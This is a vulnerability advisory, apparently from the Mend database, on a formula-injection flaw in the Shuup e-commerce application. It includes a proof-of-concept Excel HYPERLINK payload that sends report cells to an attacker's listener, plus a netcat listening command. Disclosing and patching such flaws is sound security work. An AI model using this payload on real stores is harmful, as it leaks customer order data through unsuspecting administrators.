Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: September 29, 2021
Overview“Shuup” application in versions 0.4.2 to 2.10.8 is affected by the “Formula Injection” vulnerability. A customer can inject payloads in the name input field in the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed.
Details“Shuup” application is affected by the “Formula Injection” vulnerability. A customer can inject payloads in the name input field in the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed.
PoC Detailsbrowse the application (In our case: 0.0.0.0:9000) and add a product to the cart. Click on the cart and click “proceed to checkout”. Fill the needed information in the form as you like and make sure you enter the payload given below in the name field (the first field). Press continue until you get to a page saying the order is complete.
Now browse to the admin panel (0.0.0.0:9000/sa) and go to the reports page found in the menu (on the top left).
Open a terminal and make sure you listen on some port (in our case: 4444).
Now login into the application as the store administrator with the admin credentials. Navigate to Reports tab and select the report type as Orders Report and output format as Excel. Check the Download option and click on Get Report at the bottom of the page.
Open the report and click on the payload (“Click here” in the table). Clicking the link will send the content of cells A3 and B3 in the report table to the attacker.
As the attacker, check the terminal and you will see an HTTP GET request sent with the order reference and the date and time of the order.
// Payload =HYPERLINK("http://0.0.0.0:4444?x="&A3&B3,"Click Here") // Command to listen to port 4444 sudo nc -l 4444
Affected EnvironmentsShuup 0.4.2 - 2.10.8
PreventionUpgrade to Shuup 2.11.0 or higher
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||None|
|User Interaction (UI):||Required|
|Access Vector (AV):||Network|
|Access Complexity (AC):||Medium|